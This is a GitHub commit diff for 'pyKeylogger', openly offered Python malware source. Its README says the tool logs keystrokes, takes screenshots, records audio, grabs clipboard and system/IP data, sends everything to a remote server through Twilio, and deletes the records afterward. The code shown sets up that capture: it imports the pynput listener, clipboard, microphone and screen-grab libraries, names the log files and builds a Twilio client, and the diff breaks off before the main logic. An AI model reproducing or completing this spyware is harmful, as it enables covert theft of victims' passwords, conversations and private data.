You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Key loggers are activity-monitoring software programs that give hackers access to your data. The software is installed on your computer and records everything you type. Then it sends this log file to a server, where cybercriminals wait to use all this sensitive information.
5
+
6
+
### This key logger can not only detect & record your keystrokes but can also:
7
+
8
+
- Takes screenshot at a particular interval of time
9
+
10
+
- Records audio
11
+
12
+
- Record your System’s information & IP Address
13
+
14
+
- Sends the data to the remote server using [Twilio](https://www.twilio.com/)
15
+
16
+
- Keep track of your clipboard information
17
+
18
+
## Technologies on which it is built:
19
+
```
20
+
1. Python
21
+
2. Socket
22
+
3. Platform
23
+
4. Win32
24
+
5. Pynput
25
+
6. Scipy
26
+
7. Sound-Device
27
+
8. Cryptography
28
+
9. Twilio
29
+
```
30
+
## Why pyKeylogger?
31
+
32
+
- It will broaden the way of thinking of researchers about how we can innovate the key loggers.
33
+
- It will help identify the loopholes in the current anti key loggers software.
34
+
- Multi software hack: pyKeylogger is packed with many modules to make it more advance than traditional keyloggers.
35
+
36
+
#### Capable of deleting all the records after sending them to the remote server.
''' Fernet guarantees that a message encrypted using it cannot be manipulated or read without the key. Fernet is an implementation of symmetric (also known as “secret key”) authenticated cryptography. '''
''' The OS module in Python provides functions for interacting with the operating system. OS comes under Python’s standard utility modules. This module provides a portable way of using operating system-dependent functionality. '''
2
+
3
+
importos
4
+
5
+
''' Python's time module allows to work with time in Python. It allows functionality like getting the current time, pausing the Program from executing, etc. '''
6
+
7
+
importtime
8
+
9
+
''' Socket programming is a way of connecting two nodes on a network to communicate with each other. One socket(node) listens on a particular port at an IP, while the other socket reaches out to the other to form a connection. The server forms the listener socket while the client reaches out to the server. '''
10
+
11
+
importsocket
12
+
13
+
''' In many programs we need a secure the data or program then this case we use some secret key or passwords to identifying the users. Using getpass() it is possible to accept the password in python program. '''
14
+
15
+
importgetpass
16
+
17
+
''' The Platform module is used to retrieve as much possible information about the platform on which the program is being currently executed. '''
18
+
19
+
importplatform
20
+
21
+
''' Used pywin32 for retrieving the clipboard text. '''
22
+
23
+
importwin32clipboard
24
+
25
+
''' sounddevice module provides bindings for the PortAudio library and a few convenience functions to play and record NumPy arrays containing audio signals. '''
26
+
27
+
importsounddeviceassd
28
+
29
+
''' requests module for get/post requests '''
30
+
31
+
fromrequestsimportget
32
+
33
+
''' PIL is the Python Imaging Library which provides the python interpreter with image editing
34
+
capabilities. The ImageGrab module can be used to copy the contents of the screen or the clipboard to a PIL image memory. '''
35
+
36
+
fromPILimportImageGrab
37
+
38
+
''' Twilio library forinteracting with Twilio's features. '''
39
+
40
+
fromtwilio.restimportClient
41
+
42
+
''' SciPy is a scientific computation library that uses NumPy underneath. SciPy stands for Scientific Python. It provides more utility functions for optimization, stats and signal processing '''
43
+
44
+
fromscipy.io.wavfileimportwrite
45
+
46
+
''' Fernet guarantees that a message encrypted using it cannot be manipulated or read without the key. Fernet is an implementation of symmetric (also known as “secret key”) authenticated cryptography. '''
47
+
48
+
fromcryptography.fernetimportFernet
49
+
50
+
''' This library allows you to control and monitor input devices. Currently, mouse and keyboard input and monitoring are supported. '''
51
+
52
+
frompynput.keyboardimportKey, Listener
53
+
54
+
keys_information="key_log.txt"
55
+
system_information="syseminfo.txt"
56
+
clipboard_information="clipboard.txt"
57
+
audio_information="audio.wav"
58
+
screenshot_information="screenshot.png"
59
+
60
+
keys_information_e="e_key_log.txt"
61
+
system_information_e="e_systeminfo.txt"
62
+
clipboard_information_e="e_clipboard.txt"
63
+
64
+
microphone_time=10
65
+
time_iteration=15
66
+
number_of_iterations_end=3
67
+
68
+
''' Twilio's credentials '''
69
+
70
+
account_sid="TWILIO_ACCOUNT_SID"
71
+
auth_token="TWILIO_ACCOUNT_TOKEN"
72
+
client=Client(account_sid, auth_token)
73
+
74
+
username=getpass.getuser()
75
+
76
+
''' Generate an encryption key from the Cryptography folder. '''
77
+
78
+
key=""
79
+
80
+
''' Enter the file path where your files will be stored. '''
0 commit comments